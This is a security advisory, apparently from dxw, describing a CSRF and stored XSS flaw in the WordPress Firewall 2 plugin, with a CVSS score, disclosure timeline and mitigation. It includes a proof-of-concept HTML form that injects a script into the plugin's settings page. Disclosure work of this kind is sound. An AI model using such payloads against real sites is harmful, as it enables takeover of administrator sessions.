CSRF/stored XSS in WordPress Firewall 2 allows unauthenticated attackers to do almost anything an admin can

Vulnerability

Last revised: March 16, 2017

HTML is not escaped and there is no CSRF prevention, meaning attackers can put arbitrary HTML content onto the settings page.

Current state: Identified

CVSS Summary

CVSS base scores for this vulnerability
Score	5.8 Medium
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	Partial
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Visit the following page, click on the submit button, then visit the plugin’s options page:

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
  <input type="text" name="email_address" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="set_email" value="Set Email">
  <input type="submit">
</form>

In a real attack, forms can be submitted automatically and spear-phishing attacks can be convincing.

Advisory timeline

2016-12-23: Discovered
2017-03-16: Reported to vendor by email
2017-04-04: Vendor could not be contacted

Mitigation/further actions

Disable the plugin until a new version is released that fixes this bug.

dxw advisories

Advisory: